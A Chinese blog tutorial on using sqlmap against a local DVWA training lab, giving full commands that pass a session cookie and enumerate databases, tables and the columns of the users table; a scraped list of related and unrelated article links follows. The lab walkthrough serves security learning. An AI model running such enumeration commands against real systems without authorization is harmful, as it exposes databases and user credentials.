SQLmap工具github链接:https://github.com/sqlmapproject/sqlmap

  • 搭建dvwa环境并启动。
  • windows上需要搭建Python环境,下载sqlmap包并解压。。
  • 设置dvwa级别为low(medium,high都可以,不要设成impossible就行)
  • 打开dvwa的SQL Injection,打开浏览器调试,输入user id并submit,查看拦截到的请求。
  • 可以看到是一条GET请求,url是“http://127.0.0.1/vulnerabilities/sqli/?id=12&Submit=Submit#”,cookie里有”security=low; PHPSESSID=42uo6ivi8uu4h2tdimla8m6lj6”
  • 我们先只用url试试

    结果是跳转到登录页面,看来是需要带cookie的 。
  • 这次我们加上cookie

    python sqlmap.py -u “http://127.0.0.1/vulnerabilities/sqli/?id=12&Submit=Submit#” --cookie=“security=low;PHPSESSID=42uo6ivi8uu4h2tdimla8m6lj6”

    这次看样子成功了,但是中间会不断需要输入y/n

  • 我们在后面加上参数–batch

    python sqlmap.py -u “http://127.0.0.1/vulnerabilities/sqli/?id=12&Submit=Submit#” --cookie=“security=low;PHPSESSID=42uo6ivi8uu4h2tdimla8m6lj6” --batch

  • 使用–dbs获取其所有的数据库

    python sqlmap.py -u “http://127.0.0.1/vulnerabilities/sqli/?id=12&Submit=Submit#” --cookie=“security=low;PHPSESSID=42uo6ivi8uu4h2tdimla8m6lj6” --batch --dbs

  • 使用-D xxx指定查看的数据库,用–tables查看该数据库的所有表

    python sqlmap.py -u “http://127.0.0.1/vulnerabilities/sqli/?id=12&Submit=Submit#” --cookie=“security=low;PHPSESSID=42uo6ivi8uu4h2tdimla8m6lj6” --batch --dbs -D dvwa --tables

  • 使用-D xxx -T ttt指定查看的表,用–columns查看表的列

    python sqlmap.py -u “http://127.0.0.1/vulnerabilities/sqli/?id=12&Submit=Submit#” --cookie=“security=low;PHPSESSID=42uo6ivi8uu4h2tdimla8m6lj6” --batch --dbs -D dvwa -T users --columns

    参考文章:https://blog.csdn.net/huilan_same/article/details/68067550

使用SQLmap对dvwa进行SQL注入测试相关推荐

  1. 使用Sqlmap对dvwa进行sql注入测试(初级阶段)

    0.测试准备 1)打开Kali虚拟机终端; 2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面 1.获取DVWA的url和 ...

  2. SqlMap自动化SQL注入测试工具简绍

    Sqlmap是一个开源的渗透测试工具,可以自动检测和利用SQL注入漏洞并接管数据库服务器.它配备了强大的检测引擎,为终极渗透测试仪提供了许多小众功能,以及从数据库指纹识别,从数据库获取数据到访问底层文 ...

  3. SQL注入测试神器sqlmap

    点击上方蓝字"开源优测"一起玩耍 声明 本公众号所有内容,均属微信公众号: 开源优测  所有,任何媒体.网站或个人未经授权不得转载.链接.转贴或以其他方式复制发布/发表.已经本公众 ...

  4. DVWA通关--SQL注入(SQL Injection)

    目录 LOW 通关步骤 一.手工注入 二.sqlmap注入 代码分析 MEDIUM 通关步骤 方法一.手工注入 方法二.sqlmap注入 代码分析 HIGH 通关步骤 方法一.手工注入 方法二.sql ...

  5. DVWA通关-SQL注入篇

    DVWA通关-SQL注入篇 开篇之前   我知道网上也有很多通关攻略,但都是别人通关,复制粘贴也是别人的,所以就想写一下自己的.写下这篇文章主要是记录自己的学习,以及和各位朋友交流,有错误的地方,希望 ...

  6. 如何防范SQL注入 SQL注入测试

    从测试来进行测试SQL注入. 首先,看看SQL注入攻击能分为以下三种类型: Inband: 数据经由SQL代码注入的通道取出,这是最直接的一种攻击,通过SQL注入获取的信息直接反映到应用程序的Web页 ...

  7. 安全测试中sql注入测试思路

    在找好需要测试的功能点之后,针对每种功能点(参数),sql注入测试一般遵循下面步骤: 1. 测试注入类型,数字型or字符型 如果参数中直接包含字母,那么直接可以判断是字符型参数,如id=4a. 若参数 ...

  8. 【dvwa】--SQL注入

    为了准备跑路,练习ing. SQL注入篇 LOW级别 先上源码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) {// Get input$id = $_R ...

  9. DVWA之SQL注入

    一.DVWA介绍 1.1 DVWA简介 DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如sql注入,XSS,密码破解等常见漏洞.旨在为安全专业人员测试自己的专业技 ...

最新文章

  1. ECSHOP在商品详细页面上获取该商品的顶级分类id和名称
  2. java文件拷贝时 buff给多大合适_Java复制文件
  3. UVALive 4764 dp
  4. java commons logging_Java日志介绍(5)-commons-logging
  5. Vue编写动态组件实践(render函数的使用心得)
  6. 2018: 跑图(深搜)
  7. 基于Spring Cloud搭建Zpikin数据链路追踪系统
  8. git如何选择性合并_看小姐姐用动图展示10大Git命令
  9. c51语言跑马灯键盘程序,单片机按键控制跑马灯程序
  10. Win10压缩卷提示磁盘空间不足
  11. 如何成为一个漏洞赏金猎人
  12. python机器人开发——基于Micropython的智能机器人底层控制开发
  13. android友盟统计按钮点击次数,友盟统计按钮点击事件
  14. decimal,float和double的区别是什么?
  15. 小程序:Thu May 05 2022 11:03:00 GMT+0800 (中国标准时间) 渲染层错误
  16. android怎么监听当前应用被卸载
  17. html5移动端点击复制,H5实现移动端复制文字功能
  18. beego框架 golang web项目-个人博客系统
  19. 中国每年出生人口数 1976年 - 2000年 历年男女性别比
  20. 极客早班车 - 20190320

热门文章

  1. 2246xt u盘开卡详细教程_U盘制作PE及系统安装详细教程!
  2. centos组件显示乱码,centos组件显示乱码_解决CentOS下中文显示乱码
  3. 成功解决pandas.core.indexing.IndexingError: Too many indexers
  4. Windows PowerShell:Windows PowerShell的简介、入门、使用方法之详细攻略
  5. 成功解决TypeError: tuple indices must be integers or slices, not str
  6. Python词云 wordcloud 十五分钟入门与进阶
  7. 元素、属性、标题、段落、文本格式化
  8. (原创)7-1 银行业务队列简单模拟 (30 分)
  9. MySQL InnoDB表压缩
  10. PHP5.6通过CURL上传图片@符无效的兼容问题